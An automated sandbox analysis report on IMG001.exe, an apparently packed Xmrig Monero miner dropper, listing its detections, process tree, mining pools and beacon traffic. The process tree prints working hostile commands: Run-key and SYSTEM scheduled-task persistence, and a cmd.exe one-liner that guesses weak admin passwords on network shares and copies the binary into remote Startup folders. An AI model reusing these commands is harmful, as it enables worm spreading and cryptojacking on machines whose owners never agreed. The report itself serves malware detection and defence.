Play interactive tour

Edit tour

Analysis Report IMG001.exe

Overview

General Information

Sample Name:	IMG001.exe
Analysis ID:	386387
MD5:	62e3fdcec6eed38e01571716a25d4547
SHA1:	01ef02b0abca86168ee0a61bf6cc155319b22a66
SHA256:	c096a0169583f4088a3fcfa26ac5ad6c91fee5fa247e0543a688f2f0c429091d
Infos:
Most interesting Screenshot:

Detection

Xmrig

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Xmrig cryptocurrency miner

Creates files in alternative data streams (ADS)

Detected VMProtect packer

Found stalling execution ending in API Sleep call

Found strings related to Crypto-Mining

Gathers information about network shares

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies power options to not sleep / hibernate

Obfuscated command line found

Performs a network lookup / discovery via ARP

Performs a network lookup / discovery via net view

Sample is protected by VMProtect

Spreads via windows shares (copies files to share folders)

Uses powercfg.exe to modify the power settings

Uses schtasks.exe or at.exe to add and modify task schedules

Antivirus or Machine Learning detection for unpacked file

Connects to several IPs in different countries

Contains capabilities to detect virtual machines

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains functionality to upload files via FTP

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Creates job files (autostart)

Deletes files inside the Windows folder

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Entry point lies outside standard sections

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains sections with non-standard names

PE file contains strange resources

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Uses taskkill to terminate processes

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Startup

System is w10x64

IMG001.exe (PID: 968 cmdline: 'C:\Users\user\Desktop\IMG001.exe' MD5: 62E3FDCEC6EED38E01571716A25D4547)

cmd.exe (PID: 2412 cmdline: 'C:\Windows\system32\cmd.exe' /c taskkill /f /im tftp.exe & tskill tftp.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 1124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

taskkill.exe (PID: 2432 cmdline: taskkill /f /im tftp.exe MD5: 15E2E0ACD891510C6268CB8899F2A1A1)

tftp.exe (PID: 5720 cmdline: 'C:\Users\user\AppData\Local\Temp\tftp.exe' MD5: C80D5BBD7F47398B9530A7968FF07FE3)

IMG001.exe (PID: 5600 cmdline: 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe' MD5: 62E3FDCEC6EED38E01571716A25D4547)

cmd.exe (PID: 68 cmdline: 'C:\Windows\system32\cmd.exe' /c taskkill /f /im tftp.exe & tskill tftp.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

taskkill.exe (PID: 4800 cmdline: taskkill /f /im tftp.exe MD5: 15E2E0ACD891510C6268CB8899F2A1A1)

tftp.exe (PID: 576 cmdline: 'C:\Users\user\AppData\Local\Temp\tftp.exe' MD5: C80D5BBD7F47398B9530A7968FF07FE3)

cmd.exe (PID: 6132 cmdline: 'C:\Windows\system32\cmd.exe' /c reg add 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' /v '' /d 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe' /t REG_SZ MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 4244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

reg.exe (PID: 6116 cmdline: reg add 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' /v '' /d 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe' /t REG_SZ MD5: CEE2A7E57DF2A159A065A34913A055C2)

cmd.exe (PID: 3484 cmdline: 'C:\Windows\system32\cmd.exe' /c schtasks /create /tn 'UAC' /SC ONLOGON /F /RL HIGHEST /TR 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 5384 cmdline: schtasks /create /tn 'UAC' /SC ONLOGON /F /RL HIGHEST /TR 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe' MD5: 15FF7D8324231381BAD48A052F85DF04)

cmd.exe (PID: 5388 cmdline: 'C:\Windows\system32\cmd.exe' /c schtasks /create /tn 'UAC' /RU 'SYSTEM' /SC ONLOGON /F /V1 /RL HIGHEST /TR 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 5076 cmdline: schtasks /create /tn 'UAC' /RU 'SYSTEM' /SC ONLOGON /F /V1 /RL HIGHEST /TR 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe' MD5: 15FF7D8324231381BAD48A052F85DF04)

cmd.exe (PID: 2100 cmdline: 'C:\Windows\system32\cmd.exe' /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000 MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 4168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powercfg.exe (PID: 3528 cmdline: powercfg /CHANGE -standby-timeout-ac 0 MD5: FA313DB034098C26069DBADD6178DEB3)

powercfg.exe (PID: 5800 cmdline: powercfg /CHANGE -hibernate-timeout-ac 0 MD5: FA313DB034098C26069DBADD6178DEB3)

powercfg.exe (PID: 6340 cmdline: Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000 MD5: FA313DB034098C26069DBADD6178DEB3)

cmd.exe (PID: 6476 cmdline: 'C:\Windows\system32\cmd.exe' /v:on /c @(for /f 'usebackq tokens=1' %i in (`@net view^|find /i '\\' ^|^| @arp -a^|find /i ' 1'`) do @set str_!random!=%i)& @for /f 'usebackq tokens=1* delims==' %j in (`set str_`) do @set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:- =!& set f=IMG001.exe& set n=1704& @if not '!s!'=='%COMPUTERNAME%' @echo connect to \\!s! & (for /f 'usebackq tokens=1' %j in (`net view \\!s!^|find /i ' '`) do @echo f|xcopy /y /d 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe' '\\!s!\%j\!f!' 1>nul && @echo copy to '\\!s!\%j\!f!') & @net use * /delete /y 2>nul & @(for %u in (1 !l! administrator user admin ) do @for %p in (0 1 123 %u !n! '') do @ping -n 3 localhost>nul & @(for %c in (\\!s!\C$ \\!s!\Users) do @echo connect to %c %p %u & @(if not '%p%u'=='01' net use %c '%p' /user:'%u') && @((echo [Section1] & echo p=%p %u)>'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe:P' & @(for %d in ('%c\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\Users\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!' '%c\Documents and Settings\All Users\Start Menu\Programs\Startup\!f!' '%c\Documents and Settings\%u\ \ \ \!f!' '%c\Documents and Settings\All Users\ \ \ \!f!' '%c\Windows\Profiles\%u\Start Menu\Programs\Startup\!f!' '%c\Windows\All Users\Start menu\Programs\Startup\!f!' '%c\%u\!f!' ) do @echo f|@xcopy /y /d 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe' %d 1>nul && @echo copy to %d) & @echo nul>'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe:P' & net use %c /delete /y 2>nul & @ping -n 20 localhost>nul))) MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6856 cmdline: C:\Windows\system32\cmd.exe /c @net view|find /i '\\' || @arp -a|find /i ' 1' MD5: F3BDBE3BB6F734E357235F4D5898582D)

net.exe (PID: 6948 cmdline: net view MD5: DD0561156F62BC1958CE0E370B23711B)

find.exe (PID: 7032 cmdline: find /i '\\' MD5: 9BCB215932501B45D204DC8E592EA996)

ARP.EXE (PID: 7084 cmdline: arp -a MD5: D1FC7CF6D47929C565C8EB3AFD4CFF84)

find.exe (PID: 7108 cmdline: find /i ' 1' MD5: 9BCB215932501B45D204DC8E592EA996)

IMG001.exe (PID: 4456 cmdline: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe MD5: 62E3FDCEC6EED38E01571716A25D4547)

cmd.exe (PID: 6632 cmdline: 'C:\Windows\system32\cmd.exe' /c taskkill /f /im tftp.exe & tskill tftp.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

taskkill.exe (PID: 6920 cmdline: taskkill /f /im tftp.exe MD5: 15E2E0ACD891510C6268CB8899F2A1A1)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Roaming\NsMiner\pools.txt	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x0:$s1: stratum+tcp:// 0x28:$s1: stratum+tcp:// 0x50:$s1: stratum+tcp:// 0x76:$s1: stratum+tcp:// 0x9d:$s1: stratum+tcp:// 0xc7:$s1: stratum+tcp:// 0xea:$s1: stratum+tcp:// 0x113:$s1: stratum+tcp:// 0x137:$s1: stratum+tcp:// 0x15c:$s1: stratum+tcp:// 0x183:$s1: stratum+tcp:// 0x1a8:$s1: stratum+tcp:// 0x1d2:$s1: stratum+tcp://
C:\Users\user\AppData\Roaming\NsMiner\pools.txt	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
C:\Users\user\AppData\Roaming\NsMiner\NsCpuCNMiner32.exe	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
C:\Users\user\AppData\Roaming\NsMiner\NsCpuCNMiner64.exe	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: IMG001.exe

Avira: detected

Antivirus detection for dropped file

Show sources

Source: C:\Windows\Temp\tftp.exe	Avira: detection malicious, Label: HEUR/AGEN.1126443
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\Temp\tftp.exe	Avira: detection malicious, Label: HEUR/AGEN.1126443
Source: C:\Users\user\AppData\Roaming\NsMiner\NsCpuCNMiner32.exe	Avira: detection malicious, Label: TR/BitCoinMiner.fra
Source: C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\NsMiner\IMG001.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\IMG001.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Roaming\NsMiner\NsCpuCNMiner64.exe	Avira: detection malicious, Label: TR/CoinMiner.K

Multi AV Scanner detection for domain / URL

Show sources

Source: hrtests.ru	Virustotal: Detection: 10%	Perma Link
Source: profetest.ru	Virustotal: Detection: 9%	Perma Link
Source: stafftest.ru	Virustotal: Detection: 9%	Perma Link
Source: http://hrtests.ru/test.html	Virustotal: Detection: 8%	Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\tftp.exe	Metadefender: Detection: 42%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\tftp.exe	ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Metadefender: Detection: 54%	Perma Link
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Roaming\NsMiner\NsCpuCNMiner32.exe	Metadefender: Detection: 81%	Perma Link
Source: C:\Users\user\AppData\Roaming\NsMiner\NsCpuCNMiner32.exe	ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Roaming\NsMiner\NsCpuCNMiner64.exe	Metadefender: Detection: 83%	Perma Link
Source: C:\Users\user\AppData\Roaming\NsMiner\NsCpuCNMiner64.exe	ReversingLabs: Detection: 100%
Source: C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\NsMiner\IMG001.exe	Metadefender: Detection: 54%	Perma Link
Source: C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\NsMiner\IMG001.exe	ReversingLabs: Detection: 87%

Multi AV Scanner detection for submitted file

Show sources

Source: IMG001.exe	Virustotal: Detection: 84%	Perma Link
Source: IMG001.exe	Metadefender: Detection: 54%	Perma Link
Source: IMG001.exe	ReversingLabs: Detection: 87%

Machine Learning detection for dropped file

Show sources

Source: C:\Windows\Temp\tftp.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\tftp.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\NsMiner\NsCpuCNMiner32.exe	Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\NsMiner\IMG001.exe	Joe Sandbox ML: detected
Source: C:\IMG001.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\NsMiner\NsCpuCNMiner64.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: IMG001.exe

Joe Sandbox ML: detected

Source: 6.1.IMG001.exe.70360000.9.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 6.1.IMG001.exe.73810000.32.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 6.1.IMG001.exe.70370000.5.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 6.1.IMG001.exe.73810000.23.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 6.1.IMG001.exe.73810000.2.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 6.1.IMG001.exe.73810000.17.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 6.1.IMG001.exe.73810000.16.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 6.1.IMG001.exe.73810000.31.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 6.1.IMG001.exe.73810000.28.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 6.1.IMG001.exe.73810000.26.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 6.1.IMG001.exe.73810000.1.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 6.1.IMG001.exe.73810000.15.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 6.1.IMG001.exe.70370000.12.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 6.1.IMG001.exe.70370000.13.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 6.1.IMG001.exe.73810000.30.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 6.1.IMG001.exe.73810000.35.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 6.1.IMG001.exe.73810000.14.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 6.1.IMG001.exe.73810000.21.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 6.1.IMG001.exe.73810000.18.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 6.1.IMG001.exe.73810000.20.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 6.1.IMG001.exe.701c0000.10.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 6.1.IMG001.exe.73810000.40.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 6.1.IMG001.exe.73810000.34.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 6.1.IMG001.exe.73810000.37.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 6.1.IMG001.exe.73810000.36.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 6.1.IMG001.exe.73810000.33.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 6.1.IMG001.exe.73810000.22.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 6.1.IMG001.exe.73810000.25.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 6.1.IMG001.exe.73810000.24.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 6.1.IMG001.exe.70370000.6.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 6.1.IMG001.exe.73810000.29.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 6.1.IMG001.exe.70370000.7.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 6.1.IMG001.exe.701c0000.11.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 6.1.IMG001.exe.701b0000.8.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 6.1.IMG001.exe.73810000.27.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 6.1.IMG001.exe.70370000.4.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 6.1.IMG001.exe.73810000.3.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 6.1.IMG001.exe.70950000.38.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 6.1.IMG001.exe.73810000.39.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 6.1.IMG001.exe.73810000.19.unpack	Avira: Label: TR/Crypt.XPACK.Gen7

Bitcoin Miner:

Yara detected Xmrig cryptocurrency miner

Show sources

Source: Yara match	File source: C:\Users\user\AppData\Roaming\NsMiner\pools.txt, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\NsMiner\NsCpuCNMiner32.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\NsMiner\NsCpuCNMiner64.exe, type: DROPPED

Found strings related to Crypto-Mining

Show sources

Source: pools.txt.6.dr	String found in binary or memory: stratum+tcp://mine.moneropool.com:8080
Source: IMG001.exe, 00000000.00000002.216959773.0000000000BA1000.00000004.00000020.sdmp	String found in binary or memory: pools.txt
Source: pools.txt.6.dr	String found in binary or memory: stratum+tcp://monerohash.com:5555
Source: pools.txt.6.dr	String found in binary or memory: stratum+tcp://xmr.hashinvest.net:443
Source: NsCpuCNMiner32.exe.6.dr	String found in binary or memory: E:\CryptoNight\bitmonero-master\src\miner\Release\Crypto.pdb
Source: pools.txt.6.dr	String found in binary or memory: stratum+tcp://mine.moneropool.com:8080
Source: pools.txt.6.dr	String found in binary or memory: stratum+tcp://mine.xmr.unipool.pro:3333
Source: IMG001.exe, 00000000.00000002.216959773.0000000000BA1000.00000004.00000020.sdmp	String found in binary or memory: NsCpuCNMiner32.exe
Source: pools.txt.6.dr	String found in binary or memory: stratum+tcp://mine.moneropool.com:8080
Source: pools.txt.6.dr	String found in binary or memory: stratum+tcp://monero.crypto-pool.fr:3333
Source: pools.txt.6.dr	String found in binary or memory: stratum+tcp://xmr.prohash.net:5555
Source: IMG001.exe, 00000000.00000002.216959773.0000000000BA1000.00000004.00000020.sdmp	String found in binary or memory: NsCpuCNMiner32.exe
Source: pools.txt.6.dr	String found in binary or memory: stratum+tcp://pool.minexmr.com:7777
Source: pools.txt.6.dr	String found in binary or memory: stratum+tcp://cryptonotepool.org.uk:7777
Source: pools.txt.6.dr	String found in binary or memory: stratum+tcp://mro.poolto.be:3000

Source: IMG001.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source:	Binary string: E:\CryptoNight\bitmonero-master\src\miner\Release\Crypto.pdb source: NsCpuCNMiner32.exe.6.dr
Source:	Binary string: E:\CryptoNight\bitmonero-master\src\miner\x64\CPU-Release\Crypto.pdb source: NsCpuCNMiner64.exe.6.dr

Spreading:

Performs a network lookup / discovery via ARP

Show sources

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ARP.EXE arp -a
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ARP.EXE arp -a

Performs a network lookup / discovery via net view

Show sources

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net view
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net view

Spreads via windows shares (copies files to share folders)

Show sources

Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe

File created: Z:\

Jump to behavior

Source: C:\Users\user\Desktop\IMG001.exe	Code function: 0_2_00405CEB FindFirstFileA,FindClose,	0_2_00405CEB
Source: C:\Users\user\Desktop\IMG001.exe	Code function: 0_2_00405315 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_00405315
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Code function: 6_2_00405CEB FindFirstFileA,FindClose,	6_2_00405CEB
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Code function: 6_2_00405315 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	6_2_00405315
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Code function: 26_2_00405CEB FindFirstFileA,FindClose,	26_2_00405CEB
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Code function: 26_2_00405315 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	26_2_00405315

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 194.81.6.182: -> 192.168.2.3:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.55.235.46: -> 192.168.2.3:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.241.196.51: -> 192.168.2.3:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 81.228.86.231: -> 192.168.2.3:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 149.11.89.129: -> 192.168.2.3:

Source: unknown

Network traffic detected: IP country count 31

Source: C:\Users\user\AppData\Local\Temp\tftp.exe

Code function: 5_2_00401340 GetTickCount,rand,srand,rand,Sleep,sprintf,sprintf,InternetOpenA,InternetSetOptionA,InternetConnectA,ExpandEnvironmentStringsA,sprintf,FtpPutFileA,sprintf,FtpPutFileA,ExpandEnvironmentStringsA,sprintf,FtpPutFileA,InternetCloseHandle,InternetCloseHandle,_endthread,InternetCloseHandle,_endthread,_endthread,

5_2_00401340

Source: unknown	TCP traffic detected without corresponding DNS query: 171.230.248.102
Source: unknown	TCP traffic detected without corresponding DNS query: 171.177.72.44
Source: unknown	TCP traffic detected without corresponding DNS query: 85.160.162.223
Source: unknown	TCP traffic detected without corresponding DNS query: 19.241.222.80
Source: unknown	TCP traffic detected without corresponding DNS query: 90.125.237.45
Source: unknown	TCP traffic detected without corresponding DNS query: 219.170.142.236
Source: unknown	TCP traffic detected without corresponding DNS query: 121.206.203.45
Source: unknown	TCP traffic detected without corresponding DNS query: 12.106.190.66
Source: unknown	TCP traffic detected without corresponding DNS query: 73.1.14.7
Source: unknown	TCP traffic detected without corresponding DNS query: 198.61.197.74
Source: unknown	TCP traffic detected without corresponding DNS query: 76.237.177.216
Source: unknown	TCP traffic detected without corresponding DNS query: 218.96.42.181
Source: unknown	TCP traffic detected without corresponding DNS query: 130.225.23.51
Source: unknown	TCP traffic detected without corresponding DNS query: 67.58.234.31
Source: unknown	TCP traffic detected without corresponding DNS query: 131.75.79.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.76.75.38
Source: unknown	TCP traffic detected without corresponding DNS query: 155.130.203.173
Source: unknown	TCP traffic detected without corresponding DNS query: 220.84.242.201
Source: unknown	TCP traffic detected without corresponding DNS query: 45.5.247.37
Source: unknown	TCP traffic detected without corresponding DNS query: 86.62.15.78
Source: unknown	TCP traffic detected without corresponding DNS query: 171.166.62.66
Source: unknown	TCP traffic detected without corresponding DNS query: 179.128.98.73
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.165.99
Source: unknown	TCP traffic detected without corresponding DNS query: 104.104.124.171
Source: unknown	TCP traffic detected without corresponding DNS query: 3.108.243.58
Source: unknown	TCP traffic detected without corresponding DNS query: 34.242.168.15
Source: unknown	TCP traffic detected without corresponding DNS query: 109.254.18.193
Source: unknown	TCP traffic detected without corresponding DNS query: 89.239.143.118
Source: unknown	TCP traffic detected without corresponding DNS query: 41.35.35.143
Source: unknown	TCP traffic detected without corresponding DNS query: 116.43.105.72
Source: unknown	TCP traffic detected without corresponding DNS query: 130.142.102.100
Source: unknown	TCP traffic detected without corresponding DNS query: 157.228.18.187
Source: unknown	TCP traffic detected without corresponding DNS query: 44.72.12.182
Source: unknown	TCP traffic detected without corresponding DNS query: 99.236.23.224
Source: unknown	TCP traffic detected without corresponding DNS query: 64.116.62.52
Source: unknown	TCP traffic detected without corresponding DNS query: 171.117.176.171
Source: unknown	TCP traffic detected without corresponding DNS query: 216.28.55.232
Source: unknown	TCP traffic detected without corresponding DNS query: 41.159.74.41
Source: unknown	TCP traffic detected without corresponding DNS query: 40.52.92.245
Source: unknown	TCP traffic detected without corresponding DNS query: 144.46.165.116
Source: unknown	TCP traffic detected without corresponding DNS query: 91.55.235.46
Source: unknown	TCP traffic detected without corresponding DNS query: 212.70.158.89
Source: unknown	TCP traffic detected without corresponding DNS query: 147.14.213.133
Source: unknown	TCP traffic detected without corresponding DNS query: 90.242.155.36
Source: unknown	TCP traffic detected without corresponding DNS query: 104.86.148.28
Source: unknown	TCP traffic detected without corresponding DNS query: 153.176.174.168
Source: unknown	TCP traffic detected without corresponding DNS query: 25.183.69.138
Source: unknown	TCP traffic detected without corresponding DNS query: 128.166.71.75
Source: unknown	TCP traffic detected without corresponding DNS query: 129.116.232.201
Source: unknown	TCP traffic detected without corresponding DNS query: 24.49.188.7

Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe

Code function: 6_2_738126FC HttpAddRequestHeadersA,HttpOpenRequestA,wsprintfA,HttpAddRequestHeadersA,wsprintfA,HttpAddRequestHeadersA,HttpSendRequestA,InternetReadFile,InternetErrorDlg,HttpQueryInfoA,lstrcpynA,lstrcpynA,HttpQueryInfoA,lstrcpynA,InternetCloseHandle,HttpOpenRequestA,wsprintfA,HttpAddRequestHeadersA,HttpAddRequestHeadersA,HttpAddRequestHeadersA,HttpAddRequestHeadersA,wsprintfA,HttpAddRequestHeadersA,wsprintfA,HttpAddRequestHeadersA,InternetQueryOptionA,InternetSetOptionA,InternetErrorDlg,HttpQueryInfoA,InternetSetFilePointer,

6_2_738126FC

Source: global traffic	HTTP traffic detected: GET /test.html HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: hrtests.ruConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /stat.html HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: hrtests.ruConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /test.html HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: hrtests.ruConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /stat.html HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: hrtests.ruConnection: Keep-AliveCache-Control: no-cache
